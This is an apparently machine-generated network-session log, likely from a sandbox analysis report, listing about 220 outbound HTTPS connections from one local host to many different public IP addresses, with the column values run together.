                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23072192.168.2.2338702212.107.219.188443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23073192.168.2.2359088182.216.77.190443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23074192.168.2.234292025.144.112.70443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23075192.168.2.234522632.211.133.5443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23076192.168.2.2340766117.92.178.30443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23077192.168.2.235349018.245.72.173443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23078192.168.2.235632824.135.193.235443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23079192.168.2.2345172187.249.111.80443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23080192.168.2.23599901.4.254.125443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23081192.168.2.235776432.27.146.141443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23082192.168.2.234156266.127.4.41443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23083192.168.2.235085018.248.233.175443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23084192.168.2.234938485.244.5.76443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23085192.168.2.2348010116.85.167.127443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23086192.168.2.2334246168.65.66.211443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23087192.168.2.234645673.106.151.31443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23088192.168.2.2342998147.154.97.4443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23089192.168.2.23415729.92.208.137443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23090192.168.2.235393683.231.167.173443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23091192.168.2.2356758208.189.201.131443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23092192.168.2.2354800144.42.114.193443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23093192.168.2.234545237.7.26.185443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23094192.168.2.2334536115.172.90.87443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23095192.168.2.2340148191.180.132.72443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23096192.168.2.2356922205.129.184.45443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23097192.168.2.2347776101.47.206.252443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23098192.168.2.2351524176.239.7.62443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23099192.168.2.2340680172.76.142.251443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23100192.168.2.2349952182.179.224.161443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23101192.168.2.235849250.42.153.186443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23102192.168.2.2360094126.138.34.180443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23103192.168.2.2347764188.160.255.14443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23104192.168.2.2337506205.240.56.78443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23105192.168.2.2337682167.252.62.32443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23106192.168.2.2348394197.200.136.97443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23107192.168.2.2334710134.187.57.249443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23108192.168.2.2343728184.55.62.50443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23109192.168.2.2348434129.167.84.59443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23110192.168.2.235488670.194.202.250443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23111192.168.2.2359696198.214.4.5443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23112192.168.2.2349050188.27.147.215443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23113192.168.2.2351502121.16.101.69443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23114192.168.2.234032462.225.63.174443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23115192.168.2.2343666216.12.50.160443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23116192.168.2.2359172171.152.108.145443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23117192.168.2.2341228117.152.221.134443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23118192.168.2.234243682.117.123.236443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23119192.168.2.234254227.51.247.29443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23120192.168.2.2339138120.23.106.128443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23121192.168.2.2347350161.146.251.242443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23122192.168.2.2344858191.194.222.235443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23123192.168.2.235882624.112.184.199443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23124192.168.2.2335128187.250.118.31443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23125192.168.2.234387627.197.92.181443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23126192.168.2.233587634.31.165.156443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23127192.168.2.235806235.22.174.59443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23128192.168.2.2339714151.163.74.136443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23129192.168.2.2355556171.62.245.108443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23130192.168.2.234116858.204.217.22443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23131192.168.2.234292697.23.167.38443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23132192.168.2.235186227.245.95.112443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23133192.168.2.2350058121.24.98.224443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23134192.168.2.2350424196.56.29.90443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23135192.168.2.2354302210.123.148.163443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23136192.168.2.2357956158.0.225.154443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23137192.168.2.2338136158.194.19.37443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23138192.168.2.2338490121.127.141.124443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23139192.168.2.2354206129.230.88.15443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23140192.168.2.2338630173.3.106.43443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23141192.168.2.2356038177.198.59.151443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23142192.168.2.233531617.36.21.205443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23143192.168.2.23523781.19.174.168443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23144192.168.2.2335796123.51.2.219443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23145192.168.2.234496834.163.127.222443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23146192.168.2.235929427.41.8.214443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23147192.168.2.2341766217.124.52.59443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23148192.168.2.2343448145.207.28.29443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23149192.168.2.233852271.4.227.96443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23150192.168.2.2350914219.176.212.171443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23151192.168.2.2344110155.134.183.3443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23152192.168.2.2343420170.137.55.252443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23153192.168.2.2355628135.34.141.57443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23154192.168.2.2333120102.185.36.136443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23155192.168.2.233536851.2.101.64443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23156192.168.2.235236832.109.153.217443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23157192.168.2.2356346217.37.250.242443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23158192.168.2.234376214.179.202.128443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23159192.168.2.234581838.115.169.146443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23160192.168.2.2356630142.136.148.26443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23161192.168.2.235433298.215.23.117443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23162192.168.2.2360932168.68.17.115443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23163192.168.2.233918257.249.13.103443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23164192.168.2.2352936178.139.126.85443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23165192.168.2.234021078.148.81.154443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23166192.168.2.2342170135.133.229.165443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23167192.168.2.233754083.226.21.81443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23168192.168.2.2352452125.158.39.187443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23169192.168.2.235355492.11.223.136443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23170192.168.2.2335628189.93.206.49443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23171192.168.2.2359696118.146.145.53443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23172192.168.2.234085431.62.68.11443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23173192.168.2.2339022177.34.80.146443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23174192.168.2.234972076.72.12.213443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23175192.168.2.2351930111.91.194.159443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23176192.168.2.2342310163.160.69.224443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23177192.168.2.2350258202.25.248.227443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23178192.168.2.235873880.76.138.207443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23179192.168.2.235135031.97.69.65443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23180192.168.2.2349362197.93.44.227443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23181192.168.2.2341480113.85.255.63443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23182192.168.2.2343352111.242.108.11443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23183192.168.2.2347558185.33.176.151443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23184192.168.2.235050217.178.187.59443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23185192.168.2.2346480179.18.210.120443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23186192.168.2.2359804173.240.53.31443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23187192.168.2.2353114205.46.163.30443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23188192.168.2.235572423.152.136.164443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23189192.168.2.2335048209.222.79.237443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23190192.168.2.2347206152.218.135.163443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23191192.168.2.235018652.5.247.119443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23192192.168.2.235551691.247.22.86443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23193192.168.2.2337932124.129.28.155443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23194192.168.2.23540644.23.64.108443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23195192.168.2.2352932156.63.5.24443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23196192.168.2.233446649.234.173.218443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23197192.168.2.2345714202.199.170.144443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23198192.168.2.233647841.253.59.232443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23199192.168.2.235619085.116.108.78443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23200192.168.2.235085081.127.204.181443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23201192.168.2.2350922121.152.92.24443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23202192.168.2.2359956147.230.223.85443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23203192.168.2.234836812.152.249.200443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23204192.168.2.234615076.72.19.212443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23205192.168.2.2350150140.39.123.77443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23206192.168.2.235846874.11.184.172443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23207192.168.2.2338702117.195.117.92443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23208192.168.2.2344822113.244.35.80443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23209192.168.2.2339660222.26.200.37443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23210192.168.2.235127288.84.203.60443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23211192.168.2.2340834166.65.205.65443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23212192.168.2.2357740220.47.3.88443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23213192.168.2.2343322171.35.71.226443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23214192.168.2.233660039.75.79.210443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23215192.168.2.235761037.76.176.168443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23216192.168.2.2359220198.75.225.220443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23217192.168.2.2339396114.198.215.248443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23218192.168.2.2351152159.229.34.95443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23219192.168.2.235819646.255.86.168443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23220192.168.2.2357022204.85.11.48443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23221192.168.2.2348936206.254.133.99443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23222192.168.2.234069867.26.95.27443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23223192.168.2.233659262.222.8.133443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23224192.168.2.2349808155.63.39.147443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23225192.168.2.234791259.249.136.32443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23226192.168.2.23358562.91.123.183443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23227192.168.2.2357354213.207.15.162443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23228192.168.2.235429019.158.163.129443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23229192.168.2.233700647.236.20.213443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23230192.168.2.2348868200.73.110.207443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23231192.168.2.2350682166.127.203.123443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23232192.168.2.2340056120.212.67.153443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23233192.168.2.2352390167.30.114.48443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23234192.168.2.2357582204.16.36.153443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23235192.168.2.2349442124.181.72.49443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23236192.168.2.234320632.184.42.137443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23237192.168.2.2355058105.204.13.20443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23238192.168.2.2334056170.97.212.115443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23239192.168.2.2352280137.91.91.186443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23240192.168.2.235477470.47.57.220443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23241192.168.2.2336628138.56.185.158443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23242192.168.2.2353338199.105.103.1443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23243192.168.2.234528437.222.199.194443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23244192.168.2.2332872122.146.95.101443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23245192.168.2.234118689.177.209.196443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23246192.168.2.235738490.102.97.195443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23247192.168.2.2356940164.201.63.105443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23248192.168.2.2337410221.249.143.132443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23249192.168.2.2339236121.187.184.147443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23250192.168.2.2350002197.6.47.40443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23251192.168.2.2340766213.109.166.229443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23252192.168.2.2350798194.227.134.228443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23253192.168.2.2357486184.184.160.248443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23254192.168.2.2352148153.98.158.34443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23255192.168.2.2341424148.109.164.140443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23256192.168.2.2349540126.91.47.170443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23257192.168.2.2338262162.246.184.177443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23258192.168.2.2356558136.174.183.185443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23259192.168.2.2344244139.102.254.75443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23260192.168.2.2337742118.48.50.220443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23261192.168.2.235132062.223.50.5443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23262192.168.2.234243014.57.123.119443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23263192.168.2.2345302103.152.33.203443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23264192.168.2.235935691.80.60.89443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23265192.168.2.2356368177.142.161.169443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23266192.168.2.234709612.88.225.68443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23267192.168.2.235744889.246.104.5443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23268192.168.2.2336266177.240.182.151443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23269192.168.2.233868293.223.217.188443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23270192.168.2.235167861.0.80.15443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23271192.168.2.2359912198.173.120.79443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23272192.168.2.2358120203.63.243.159443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23273192.168.2.2355126165.88.89.229443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23274192.168.2.2335132184.55.100.93443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23275192.168.2.2353600171.8.163.51443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23276192.168.2.234040460.96.251.110443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23277192.168.2.233479274.237.130.222443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23278192.168.2.234384689.56.18.139443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23279192.168.2.2353940206.158.219.205443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23280192.168.2.2344408191.189.101.139443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23281192.168.2.2343776195.185.196.209443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23282192.168.2.2342306222.181.180.97443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23283192.168.2.2344078103.217.236.136443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23284192.168.2.234501098.192.186.88443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23285192.168.2.2348286173.69.162.234443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23286192.168.2.235818089.24.42.220443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23287192.168.2.2339060122.79.145.135443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23288192.168.2.235228879.37.202.223443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23289192.168.2.235627818.46.198.173443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23290192.168.2.2354682197.204.106.155443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23291192.168.2.2335434157.171.87.244443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23292192.168.2.2352158178.41.232.57443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23293192.168.2.2347248213.17.63.15443
